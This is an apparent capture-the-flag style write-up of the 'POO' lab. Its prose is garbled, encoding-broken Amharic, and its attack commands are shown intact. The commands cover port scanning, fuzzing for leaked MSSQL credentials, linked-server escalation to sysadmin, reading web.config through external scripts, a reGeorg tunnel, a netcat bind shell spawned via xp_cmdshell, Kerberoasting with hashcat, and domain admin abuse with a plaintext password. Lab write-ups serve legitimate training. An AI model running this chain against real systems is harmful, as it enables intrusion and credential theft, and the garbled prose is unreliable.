á áá
á˝áá ááľáĽ áá˝áá áĽáť áłááá á¨áŁá˘áŤá áá áŤááá á á ááá áá-ááĽáŤáśáŞ áááŁáĄá áĽááá¨ááŤáá
á ááááŤá áá áĽáá°á°ááá¸áᣠPOO á ááá á¨áĽááśá˝ á°á¨ááá˝ á áľáá˝ á áá˛á áłááŹáá°áŞ á áŤáŁá˘ ááľáĽ á˝ááłáá˝á áááá°á˝ á¨á°áá¨á° ááᢠáᥠáŤááá á áľá°ááá ááááľáŁ áአááĽáśá˝á ááłá°á áĽá á áá¨á¨áťá á áá°áą ááľáĽ 5 áŁáá˛áŤáá˝á á áá°áĽá°áĽ áááá á፠ááááľ ááá˘
á¨ááŚáŤáśáŞ áá áŤáá áááááľ á VPN á áŠá áá. áľááá¨á á°á áááľ á ááľ ááá á¨ááŤáá á°áá˝ áá áá° áá á ááłá¨áá¨áĽ á˛áᥠá¨áá°áŤ áŽááá°á ááá ááĽááľá á áá áá¨á áŤáá áľ á áľá°ááá áĽááłáááá ááá¨áŤá đ
áľáá
áłá áá¨á
áľá á áłá˛áľ ááŁáĽáá˝áŁ áśááľááŽá˝ áĽá ááá˝ áá¨ááá˝ áááá
áĽáá˛á˝á áĽá áá ááŠá˘
ááá áá¨ááá˝ ááľáá
ááłá ááááá˝ áĽáť á¨á°á°áĄ áá¸áᢠá¨áá
á°ááľ á°áŤá˛ áá
áá á°ááľ á ááĽááľ á¨á°áááá áĽáááľ áĽá áá´áá˝ á áá áá á ááá áá ááá°áá°á ááłáľ ááá á áááľ áááááľ á áááľáľá.
ááá˘áŤ
áá á¨áá¨á¨áť á¨ááł áááľ áá˝áá˝á áŤáá á˛áá 5 áŁáá˛áŤáá˝á áááá˘
áŤáá á áľá°ááá
ááá፠áĽá á áľáŤáťá á°á°áĽáˇáá˘
ĐĐ°ŃноП!
áŁáá˛áŤ áĽáá°áá áŤááą
áá
áá˝á á¨á á á á áľáŤáť á áá 10.13.38.11 áá° /etc/hosts á¨áá¨áá¨áá˘
10.13.38.11 poo.htb
á¨ááááŞáŤá áĽááá áááľ áá°áŚá˝á ááááľ áá. áááá áá°áŚá˝ á nmap áááááľ á¨á á áá áľááááľáľ á ááááŞáŤ á masscan á á°áááááᢠáááá TCP áĽá UDP áá°áŚá˝ ᨠtun0 á áááá˝ á 500pps áĽáááááá˘
sudo masscan -e tun0 -p1-65535,U:1-65535 10.13.38.11 --rate=500
á ááᣠá áá°áŚáš áá áľááá°áŠ á áááááśá˝ á¨á áá áááá áá¨á áááááľáŁ á -A á ááŤá áĽáááá˘
nmap -A poo.htb -p80,1433
áľááá
ᣠIIS áĽá MSSQL á áááááśá˝ á ááᢠá áá
á ááŁá á¨á፠áĽá á¨áŽáááŠá°á áľáááá á¨á˛ á¤á á¤áľ áľá áĽáááááᢠá áľá á áááአááᣠá IIS áááť áá˝ á°áááł á°á°áĽáśááá˘
áľá áááŤááš áĽááľáááᢠááá
ááĄáľá°á áĽá ááááᢠá áááŞáŤááš ááľáĽ á¨áĽá¨áśá˝ áĽááľ 128 (-t)ᣠURL (-u)ᣠáááá áááľ (-w) áĽá áĽáá á¨ááľáĄá (-x) á
áĽáŤáá˝á áĽááááťááá˘
gobuster dir -t 128 -u poo.htb -w /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt -x php,aspx,html
áľááá
ᣠá/á áľá°áłáłáŞá áááŤáŁ áĽáá˛áá á¨.DS_Store á´áľááśá á áááááľ áá¨ááť ááá HTTP áá¨áá፠á ááᢠ.DS_Store áá áá á¨á°á áá á
ááĽáŽá˝á á¨ááŤá¨ááš áĽáá° á¨áááá˝ ááááᣠá¨á áś áŚáłáŁ á¨á°áá¨á á¨ááᣠááľá áŤá áááá˝ áá¸áᢠáĽáá˛á
ááááą ááá á áľá ááá˘áá˝ á¨áľá á áááá áá፠ááľáĽ áá ááá
áá˝ááᢠáľááá
, áľá áááŤá áááľ áá¨á áĽááááá. ááá
á áá áá áá˝áá
python3 dsstore_crawler.py -i http://poo.htb/
á¨áááŤáá áááśá˝ áĽááááá. áĽáá
á áŁá á¨ááŤáľá°áľáľ ááá ᨠ/ dev áá፠áá, á¨áĽáą ááľáĽ áááŽá˝á áĽá á˛á˘ áááá˝á á áááľ á
áááŤáá˝ ááľáĽ áá¨áľ áĽáá˝ááá. áá á áááááą áá áá áá¤áľ á áá áľá á¨á°ááá á¨áá á¨ááááŞáŤáášá 6 á¨ááá áĽá á¨áá፠áľáá˝á áá áá áĽáá˝áááᢠáá
áá á°áááááľ á áá áá áá¨ááἠáá˝ááá˘
áĽá á "poo_co" á¨áááá á ááľ á¨á˝áá ááá áĽáááááᢠááĽá áá ááľá¨á áĽááłááĽá áłááá
á ááá á¨áááá -áááą áááá áááľ á "áŽ" á¨ááááŠáľá áááľ áá áááŤááá˘
cat /usr/share/seclists/Discovery/Web-Content/raft-large-words.txt | grep -i "^co" > co_words.txt
áĽá á wfuzz ááľáááľá˘
wfuzz -w ./co_words.txt -u "http://poo.htb/dev/dca66d38fd916317687e1390a420c3fc/db/poo_FUZZ.txt" --hc 404
áĽá áľáááááá áá áŤáá! áá
áá ááá áĽáááá¨áłááᣠááľááááąá áĽááľááἠ(á DBNAME áá¤áľ á áááá áĽáṠᨠMSSQL á¨áᥠáá¸áá˘)
áŁáá˛áŤáá á áľá¨áá á á 20% áĽááľááááá˘
á áŁáá˛áŤ
ᨠMSSQL áá áĽááááááᣠDBeaverá áĽá ááááá˘
á áá
áłáłá¤á ááľáĽ ááá á¨ááŤáľá°áľáľ ááá á áááááᣠáĽáľá˛ SQL Editor áĽááá á áĽá á°á áááá˝ áá áĽáá°áá áĽáááľá˝á˘
SELECT name FROM master..syslogins;
áááľ á°á áááá˝ á ááᢠááĽáśáťá˝áá áĽáááľá˝á˘
SELECT is_srvrolemember('sysadmin'), is_srvrolemember('dbcreator'), is_srvrolemember('bulkadmin'), is_srvrolemember('diskadmin'), is_srvrolemember('processadmin'), is_srvrolemember('serveradmin'), is_srvrolemember('setupadmin'), is_srvrolemember('securityadmin');
áľááá
, ááá áአááĽáśá˝ á¨áá. á¨á°ááááľá á ááááŽá˝ áĽáá, áľááá
áá´ á áááá á˝ááŤáá
SELECT * FROM master..sysservers;
áľááá
áá SQL á áááá áĽáááááᢠáááľ áá áá
() á áá áá á áá
á áááá áá á¨áľáĽááá˝á á ááťá¸á áĽáááľá˝á˘
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'select @@version as version');
áĽá á¨áĽáŤá áá áĽááłá ááááŁáľ áĽáá˝áááá˘
SELECT version FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT version FROM openquery("COMPATIBILITYPOO_PUBLIC", ''select @@version as version'');');
áĽáááłá áá áá°ááá á áááá áĽáŤá áľáááἠáĽáŤáá á¨áá¨áááá á áá á°á áá á ááľ ááľáĽ áá! á á°áááá á áááá áá áá á¨á°á áá á ááľ áĽáŤááľá áĽáá°áá áĽááá˘
SELECT name FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT user_name() as name');
áĽá á áá á¨á°áááá á áááá áá° áĽá á¨áá¨á á áĽáŤá á á¨áľáá á ááľ áĽáá°áááá áĽáá!
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT name FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT user_name() as name'');');
áľááá
ᣠááá ááĽáśá˝ áááŠáľ á¨áááŁá á¨DBO á ááľ ááᢠá¨á°ááá á áááá áĽáŤá á˛ááἠáአááĽáśá˝á áĽáááľá˝á˘
SELECT * FROM openquery("COMPATIBILITYPOO_CONFIG", 'SELECT * FROM openquery("COMPATIBILITYPOO_PUBLIC", ''SELECT is_srvrolemember(''''sysadmin''''), is_srvrolemember(''''dbcreator''''), is_srvrolemember(''''bulkadmin''''), is_srvrolemember(''''diskadmin''''), is_srvrolemember(''''processadmin''''), is_srvrolemember(''''serveradmin''''), is_srvrolemember(''''setupadmin''''), is_srvrolemember(''''securityadmin'''')'')');
áĽáá°áááá¨áąáľ, ááá áአááĽáśá˝ á áá! á áľá°áłáłáŞáŤá˝áá áĽáá°áá
áĽááá áᢠááá áá á áááľ áá áá
á ááá
áąáá¸ááᣠá EXECUTE AT áĽááľáááá˘
EXECUTE('EXECUTE(''CREATE LOGIN [ralf] WITH PASSWORD=N''''ralfralf'''', DEFAULT_DATABASE=[master], CHECK_EXPIRATION=OFF, CHECK_POLICY=OFF'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''CREATE USER [ralf] FOR LOGIN [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER SERVER ROLE [sysadmin] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
EXECUTE('EXECUTE(''ALTER ROLE [db_owner] ADD MEMBER [ralf]'') AT "COMPATIBILITYPOO_PUBLIC"') AT "COMPATIBILITYPOO_CONFIG";
áĽá á áá á¨á á˛áą á°á áá ááľááááśá˝ áá áĽáááááá, á á˛áąá á¨áŁáá˛áŤ áłáłá¤á áá¨áłá°á.
áá
áá áŁáá˛áŤ á áľá¨áá á áá° ááľ áĽáááłááá˘
á¨áá áľáŤá áŁáá˛áŤ
MSSQLá á°á á áá áááá áĽááááᣠáĽá á¨á˘áááŹáľ ááŹá mssqlclient áĽá¨á°á ááአááá˘
mssqlclient.py ralf:[email protected] -db POO_PUBLIC
á¨ááá ááá˝á ááááľ á ááĽá, áĽá áá°á á˛á áŤáááá á¨ááááŞáŤá ááá áŁá˘áŤá áá. áľááá
, á¨áľá á áááá áááá áĽáááááá (ááš áźá áááŁá á¨áááťá áá, áá¨ááá áĽá¨á°áŤ áĽáá°áá áááľáá).
áá ááłá¨áť á°á¨ááááᢠááá áĽááłá áááá ᨠMSSQL ááá ἠáĽáá˝ááᣠáá ááááľ á¨ááŽááŤá á ááŁáĽ ááááá˝ áĽáá°á°ááአááá
áĽáť áŤáľáááááᢠáĽá á MSSQL áá፠ááľáĽ Python áĽááłá á áááá.
á¨á፠ᨠweb.config áááá áááá ἠááá á˝áá á¨áá.
EXEC sp_execute_external_script
@language = N'Python',
@script = "print(open('C:inetpubwwwrootweb.config').read())"
ááľááááśá˝ á¨á°ááᣠáá°/á áľá°áłáłáŞ áááą áĽá áŁáá˛áŤáá ááá°áąá˘
á¨áĽáá¨á áŁáá˛áŤ
áĽáá° áĽáááą á¨áá áá¨áááá ááá áá á ááłááľ á˝ááŽá˝ á á, ááá áá á¨á ááłá¨ áá¨áĽ á ááĽáŽá˝á áľáááá¨áľ, IPv6 ááŽáśáŽá áĽá á áá áĽáá°ááá áĽááľá°áááá!
áá
áá á áľáŤáť áá° /etc/hosts áŤááá˘
dead:babe::1001 poo6.htb
á áľá°áááá áĽáá°áá áĽááááᣠáá á áá
áá á IPv6á˘
áĽá á¨WinRM á áááááľ á IPv6 áá ááááᢠá¨á°áááľ ááľááááśá˝ áá áĽááááá˘
á á´áľááśá áá áŁáá˛áŤ á áᣠá áľá¨ááĽá˘
á¨á°áá á áŁáá˛áŤ
áá á áľá°ááá
áá áľáá á áá
setspn.exe -T intranet.poo -Q */*
áľáááá á MSSQL á áŠá áĽááľáá˝á.
á áá
ááááľ á¨á°á áááá˝á SPN p00_hr áĽá p00_adm áĽáááááᣠáá
áááľ áĽáá° á¨áá¤áŽá áľá°á áá áĽááśá˝ á°ááá áá¸á áááľ ááᢠá á ááŠáŁ á¨ááá áááťá¸áá áá˝ ááááľ áĽáá˝áááá˘
á ááááŞáŤ ᨠMSSQL á°á ááá áááá á¨á°á¨áá áźá ááááľ á ááŚáľá˘ ááá áá ááłá¨áťá á¨á°áá°á áľáááá á¨á áľá°ááá áá áááááľ áŤáá á áá°áŚá˝ 80 áĽá 1433 áĽáť ááᢠááá áá áá°áĽ 80 áľáŤáá ááżááŞáŤ ááťáá! ááá
áĽáá áááá
áá áĽáąá áááááľ áľáááá 404 áľá
á°áľ áá°ááľáĽáá áá
áááľ *.aspx áááá˝ á áá°áá áŠá áááľ ááᢠá áĽááá
á
áĽáŤáá˝ áááá˝á áááľáŹáľ ASP.NET 4.5 á áĽáá°áá¨á°áá ááŤáá˘
dism /online /enable-feature /all /featurename:IIS-ASPNET45
áĽá á áá, tunnel.aspx á áľáá°ááľ, ááá ááá ááááľ ááá áá á¨áááá áááľ áĽááááá.
áľáŤááá á¨ááŤáľá°ááááá á¨áá°áá áŞáŤáá á°áá á ááá áĽááááᢠáááá áľáŤáá á¨áá°áĽ 5432 áá° á áááአáĽááľá°áááááá˘
python ./reGeorgSocksProxy.py -p 5432 -u http://poo.htb/tunnel.aspx
áĽá á¨ááááá áá°áá áŞáŤ áľáŤáá á áĽá ááŽáᲠáááá ááŽáᲠáźááá áĽáá ááááᢠáá
á á°áŞ áá° /etc/proxychains.conf áá
á¨áľ ááá áĽáá¨ááá˘
á áá ááŽááŤáá áá° á áááአáĽáááá
á ááᣠá MSSQL á áŠáᣠá°ááá áĽááľááá¨áááá˘
xp_cmdshell C:tempnc64.exe -e powershell.exe -lvp 4321
áĽá á ááŽáá˛áŤá˝á á áŠá áĽááááááá˘
proxychains rlwrap nc poo.htb 4321
áĽá áá˝ášá áĽááá°áľ.
. .Invoke-Kerberoast.ps1
Invoke-Kerberoast -erroraction silentlycontinue -OutputFormat Hashcat | Select-Object Hash | Out-File -filepath 'C:tempkerb_hashes.txt' -Width 8000
type kerb_hashes.txt
á ááá á á áĽááá
áá˝áá˝ áá áá°ááá áŤáľáááááłá. áŽááŽá á¨ááá áá áłáł áááá áááľ áľáááá á¨á á á´áááľáľ ááľáĽ á¨áá¨áĄáľá áááá á¨ááá ááá˝ áááá áááľ á°á áááŠá˘ áááá á áá˝áŤáľá áĽáá ááááá˘
hashcat -a 0 -m 13100 krb_hashes.txt /usr/share/seclists/Passwords/*.txt --force
áĽá áááąáá á¨ááá ááá˝áŁ á¨ááááŞáŤá á dutch_passwordlist.txt áááá -áááľ ááľáĽ áĽá ááá°áá á Keyboard-Combinations.txt ááľáĽ áĽáááááá˘
áĽá áľááá
áśáľáľ á°á áááá˝ á áá, áá° á፠áááŁá áŞáŤ áĽáááłáá. ááááŞáŤ á áľáŤáťáá áĽááá
á˘
á áŁá áĽáŠáŁ á¨á፠áááŁá áŞáŤáá á¨á áá á áľáŤáť á°áá¨ááᢠáááá á¨á፠á°á áááá˝á áĽá áĽáá˛áá á¨áľáá á áľá°áłáłáŞ áĽáá°áá áĽááá
ᢠPowerView.ps1 áá¨á áááááľ áľááŞááąá áááá¨áľá˘ á¨ááŤá á -s áááŞáŤ ááľáĽ áááŤáá á¨áľááŞááľ áá á áááá˝ áá-áá á áá áá áĽáááááá. áĽá á¨á፠ᨠPowerView áľááŞááąá áĽáť ááŤáá˘
á áá áááá á°ááŁáŤáśášá ááááľ á áá. á¨p00_adm á°á áá ááĽáľ áŤáá á°á áá áááľááᣠáľááá
á áĽáą á ááľ ááľáĽ áĽáá°áŤááᢠááá
á°á áá á¨PSCRidential ááá áĽááá áá˘
$User = 'p00_adm'
$Password = 'ZQ!5t4r'
$Cpass = ConvertTo-SecureString -AsPlainText $Password -force
$Creds = New-Object System.Management.Automation.PSCredential -ArgumentList $User,$Cpass
á áá Creds á¨ááááá áŁá¸á ááá á¨Powershell áľáááá˝ p00_admá á ááá¨á ááá¸ááᢠá¨á°á áááá˝á áááá áĽá á¨á áľá°áłáłáŞáá áá፠áŁá ᪠áĽááłáá˘
Get-NetUser -DomainController dc -Credential $Creds | select name,admincount
áĽá áľááá
ᣠá¨áĽá á°á áá á áĽáááľ áአááĽáľ á ááᢠá¨á¨áľááš áĄáľáá˝ á áŁá áĽáá°áá áĽááá˘
Get-NetGroup -UserName "p00_adm" -DomainController dc -Credential $Creds
á áá¨á¨áť á°á ááá á¨á፠á áľá°áłáłáŞ áááá áĽáá¨áááŁááᢠáá
á áááľ áá° á፠áááŁá áŞáŤ ááááŁáľ ááĽáľ áá°á áá. ááťá˝áá á°á á
áá á WinRM ááááŁáľ áĽááááᢠáá-ááá á˛á áá á áŹááŚáá
á á°á°áĄáľ áľá
á°áśá˝ á፠á°ááŁáá˘
á¨á፠áá ááá áĽáá áááá
ááááááľ áĽááááŤáá, áĽá á áľáááą ááľáĽ áá.
áŁáá˛áŤ áá á¨ááᢠá¨á፠á°á áááá áááá¨áą áĽá á´áľááśáá˝á áŤá¨áááĄá˘
mr3ks áá áŁáá˛áŤáá áĽááááá áĽá ááŚáŤáśáŞá 100% á°á áá
ááá˘
ááźá áá. áĽáá° ááĽá¨ áááľáŁ á¨áá
á˝áá á á˛áľ ááá áĽáá°á°ááá áĽá ááĽááľá á áá áľáááá á áľá°áŤá¨áľ ááľáĄá˘
á áá áááááá áá˝ááá˘
ááá: hab.com